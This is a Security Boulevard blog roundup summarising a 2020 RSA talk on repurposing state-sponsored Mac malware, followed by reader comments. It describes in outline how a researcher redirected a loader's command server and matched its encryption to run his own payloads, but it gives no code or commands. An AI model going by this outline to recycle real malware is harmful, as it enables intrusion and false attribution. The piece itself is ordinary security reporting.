Hot Topics
Cybersecurity Featured Malware News Security Boulevard (Original) Spotlight Threats & Breaches 

Recycling State-Sponsored Malware for Fun and Profit

by Richi Jennings on March 3, 2020

What if criminals could reuse threats written by the NSA or Iran and repurpose it to attack their own targets? Not only would they get the benefit of some sophisticated malware code, but they also could misdirect researchers as to the malware’s origins.

The ex-NSA hacker, Patrick Wardle (pictured), gave one of the RSA Conference’s more interesting talks last week. In it, he gave some examples of how such a recycle effort could be done.

Fascinating. In today’s SB Blogwatch, we reuse and recycle (but never reduce).

Your humble blogwatcher curated these bloggy bits for your entertainment. Not to mention: My Corona(virus).

Misdirection Ahoy

What’s the craic? Dan Goodin reports—“Stealing advanced nations’ Mac malware isn’t hard”:

 At the RSA Security conference this week, a former hacker for the [NSA] demonstrated an approach that’s often more effective: stealing and then repurposing a rival’s code. [It] can be a smarter and less resource-intensive approach for deploying ransomware, remote access spy tools, and other types of malicious code [especially] repurposing of advanced code written by government-sponsored hackers.

The repurposing caused the malware to report to command servers belonging to Wardle rather than the servers designated by the developers. [It] allowed him to use well-developed and fully featured applications to install his own malicious payloads, obtain screenshots and other sensitive data from compromised Macs, and carry out other nefarious actions written into the malware.

Wardle used a hex editor to change the original version’s hard-coded control server domain to the address of the server under his control. [His] control server had to, among other things, encrypt [the payload] with the same key and cipher he observed during his analysis.

Malware repurposing is [not] unique to Mac. … This kind of recycling works against any operating system or platform. … “The idea is to let those with more time, money, and resources do all the hard work,” … Wardle said.

And Ben Lovejoy adds—“Ex-NSA hacker made … state-created Mac malware run his own code”:

 The way this type of malware works is to upload captured data to servers owned by the government which created them, and to download additional malware from these servers. Wardle was able to crack the encryption used and to point the malware to his own server instead.

This is, he says, already happening. For example, there is evidence that malware developed by the NSA has been used by China, North Korea, and the Russian Federation. Something to bear in mind when the US government is asking Apple to create a compromised version of iOS for use by US law enforcement.

But why? Malcolm Owen explains—“an effective approach for malware creators”:

 There could be two key benefits for hackers by taking the approach, with the main one being how other state-sponsored groups could save having to develop or risk exposing their own malware to accomplish a task. This would allow them to keep their own techniques and software secret for use in the future, minimizing detection down the line.

The second byproduct is that, if the malware is detected and analyzed, blame for the attack could be attributed to the malware’s original developers and not the active users.

[Also] the code developed by the teams is usually better and not as resource-intensive as other home-cooked efforts, and are probably more robust.

From the horse’s mouth? Patrick Wardle—“repurposing a 1st-stage loader, to execute custom ‘fileless’ payloads”:

 In a nutshell, the idea is take existing malware and reconfigure (“repurpose” or “recycle”) it for your own surreptitious purposes (i.e. testing, red-teaming, offensive cyber-operations, etc).

The many benefits of repurposing others’ malware … basically boil down to the fact that various well-funded groups and agencies are creating fully-featured malware, so why not leverage their hard work, in a way (that if discovered) will likely be (mis)attributed back to them? … IMHO, it’s a lovely idea.

The Lazarus group’s malware … is a perfect candidate for repurposing. … As a 1st-stage loader, it simply beacons out to a remote server for 2nd-stage payloads (which … are executed directly from memory).

It should be rather trivial to repurpose the loader to communicate instead with our server, and thus stealthily execute our own 2nd-stage payloads … without us having to write a single-line of (client-side) code.

After identifying a malware specimen to … “recycle,” the next step is to comprehensively understand how it works. [Then] we should be able remote transmit an encrypted & encoded binary payload and have the malware execute directly from memory.

All is lost! geekmux mucks it up: [You’re fired—Ed.]

 We humans managed to take this host planet and carve it up into countries. What’s yours is yours, and what’s mine is mine.

Or at least until I decide what’s yours is mine too. And then we go to war. Later, rinse, and repeat for oh I dunno, the last few thousand years.

At some point, we humans gave birth to this virtual world. But it’s still a world built and represented by humans. … What the **** did you expect would happen? Even Nostradamus’ dog could have seen that stupid **** coming a century away.

So Lkrupp sounds slightly sarcastic:

 This just reinforces the idea that government backdoors into encrypted data would be perfectly safe in the hands of bureaucrats. Nothing to worry about here.

As does Michael Knopp:

 What a load of fake news. Everybody (in Washington DC) knows that weaknesses made for them good guys … can only be used by the good guys. It is impossible for the bad guys … to ever use something that the good guys use to protect the children (or whatever other emotionally charged thing you are interested in) for nefarious purposes.

And what have we learned? Here’s kot-begemot-uk, with a perspective:

 Any “researcher” trying to attribute something to CIA, KGB, GRU, Mossad, etc., on the grounds of “they are using the same malware” should be tarred, dipped in feathers and manure and made to start and sign any of his articles with a suitable picture of him covered in feathers and bull**** similar to the one they spread.

Alternatively they should start with a disclaimer of who is paying them for the propaganda hatchet job.

Or, to put it another way, Jedakiah corollorizes thuswise:

 This gives nation states the plausible deniability they need to get away with a lot more intrusive actions.

Meanwhile, ArhcAngel goes all Jobsian on us:

 Who was it that said, “Good artists copy, great artists steal”?

And Finally:

An MD sings: Covid-19 and racism

Previously in And Finally

You have been reading SB Blogwatch by Richi Jennings. Richi curates the best bloggy bits, finest forums, and weirdest websites… so you don’t have to. Hate mail may be directed to @RiCHi or [email protected]. Ask your doctor before reading. Your mileage may vary. E&OE.

Image source: The CyberWire (cc:by-nd)

Richi Jennings

Recent Articles By Author
More from Richi Jennings
Richi Jennings , , , ,

Richi Jennings

Richi Jennings is a foolish independent industry analyst, editor, and content strategist. A former developer and marketer, he’s also written or edited for Computerworld, Microsoft, Cisco, Micro Focus, HashiCorp, Ferris Research, Osterman Research, Orthogonal Thinking, Native Trust, Elgan Media, Petri, Cyren, Agari, Webroot, HP, HPE, NetApp on Forbes and CIO.com. Bizarrely, his ridiculous work has even won awards from the American Society of Business Publication Editors, ABM/Jesse H. Neal, and B2B Magazine.

richi has 605 posts and counting.See all posts by richi